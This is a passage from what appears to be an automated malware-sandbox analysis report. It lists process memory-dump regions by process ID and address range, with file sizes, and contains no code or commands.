                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4320-274-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4324-363-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4332-319-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4332-323-0x0000000000400000-0x00000000004BE000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      760KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4404-293-0x0000000003540000-0x0000000003550000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      64KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4404-271-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4404-301-0x0000000003790000-0x00000000037A0000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      64KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4476-251-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4528-253-0x0000000002280000-0x0000000002282000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4528-245-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4628-368-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4788-364-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4916-366-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5020-360-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5048-361-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5052-270-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5088-362-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5108-358-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5148-299-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5148-282-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5160-288-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      80KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5160-283-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5200-354-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5228-290-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5296-352-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5308-326-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5316-348-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5348-330-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5348-342-0x0000000005280000-0x000000000528F000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      60KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5348-343-0x0000000005410000-0x0000000005425000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      84KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5348-340-0x0000000003290000-0x0000000003570000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2.9MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5348-335-0x00000000005C0000-0x000000000066E000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      696KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5388-332-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5396-350-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5404-351-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5416-349-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5524-341-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5608-355-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5688-367-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5724-346-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5732-356-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5772-347-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5848-369-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5944-333-0x0000000005070000-0x0000000005071000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5944-322-0x0000000005010000-0x0000000005011000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5944-339-0x00000000050C0000-0x00000000050C1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5944-337-0x00000000050A0000-0x00000000050A1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5944-336-0x0000000005090000-0x0000000005091000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5944-329-0x0000000005050000-0x0000000005051000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5944-331-0x0000000005060000-0x0000000005061000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5944-334-0x0000000005080000-0x0000000005081000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5944-328-0x0000000005040000-0x0000000005041000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5944-327-0x0000000005030000-0x0000000005031000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5944-325-0x0000000005020000-0x0000000005021000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5944-338-0x00000000050B0000-0x00000000050B1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5944-307-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5944-317-0x0000000005000000-0x0000000005001000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5944-318-0x0000000005100000-0x0000000005101000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5944-316-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/5944-314-0x0000000003930000-0x000000000396C000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      240KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/6004-311-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/6012-310-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/6012-320-0x0000000001810000-0x0000000001812000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/6036-312-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/6040-365-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/6048-315-0x0000000000400000-0x000000000044C000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      304KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/6048-313-0x0000000000000000-mapping.dmp